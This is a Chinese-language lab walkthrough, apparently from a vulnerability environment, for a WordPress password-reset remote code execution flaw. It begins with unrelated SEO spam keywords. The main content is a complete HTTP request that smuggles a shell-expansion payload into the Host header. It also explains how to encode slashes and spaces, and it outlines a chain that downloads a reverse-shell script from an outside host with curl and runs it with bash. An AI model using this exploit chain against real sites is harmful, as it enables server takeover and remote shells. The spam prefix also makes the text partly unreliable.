网站开发报价清单,网站你懂我意思正能量app,使用php做的网站有哪些,广告公司门头由于Mysql初始化需要一段时间#xff0c;所以请等待。成功运行后#xff0c;访问http://your-ip:8080/打开站点#xff0c;初始化管理员用户名和密码后即可使用#xff08;数据库等已经配置好#xff0c;且不会自动更新#xff09;。 发送如下数据包#xff0c;可见/tmp…
由于Mysql初始化需要一段时间所以请等待。成功运行后访问http://your-ip:8080/打开站点初始化管理员用户名和密码后即可使用数据库等已经配置好且不会自动更新。 发送如下数据包可见/tmp/success已经成功创建
POST /wp-login.php?actionlostpassword HTTP/1.1
Host: target(any -frootlocalhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencodedwp-submitGetNewPasswordredirect_touser_loginadmin 但实际利用起来还是有一些坑需要踏过。具体的坑有这么几个 执行的命令不能包含大量特殊字符如:、引号等。 命令会被转换成小写字母 命令需要使用绝对路径 需要知道某一个存在的用户的用户名
为了解决这些坑漏洞作者想出了利用${substr{0}{1}{$spool_directory}}代替/用${substr{10}{1}{$tod_log}}代替空格的方法。
但是还是有很多字符不能用所以我们需要将待执行的命令放到第三方网站中然后通过curl -o /tmp/rce example.com/shell.sh的方法先将他下载到/tmp目录中再去执行。
所以总体来说利用过程如下 编写反弹shell的exp放到某个网页里。有如下要求 整个url的大写字母会被转换成小写所以大写小敏感的系统不要使用大写字母做文件路径 访问该网页不能跳转因为follow跳转的参数是-L大写 拼接成命令/usr/bin/curl -o/tmp/rce example.com/shell.sh和命令/bin/bash /tmp/rce 将上述命令中的空格和/转换成${substr{10}{1}{$tod_log}}和${substr{0}{1}{$spool_directory}} 拼接成HTTP包的Host头target(any -frootlocalhost -be ${run{command}} null) 依次发送这两个拼接好的数据包
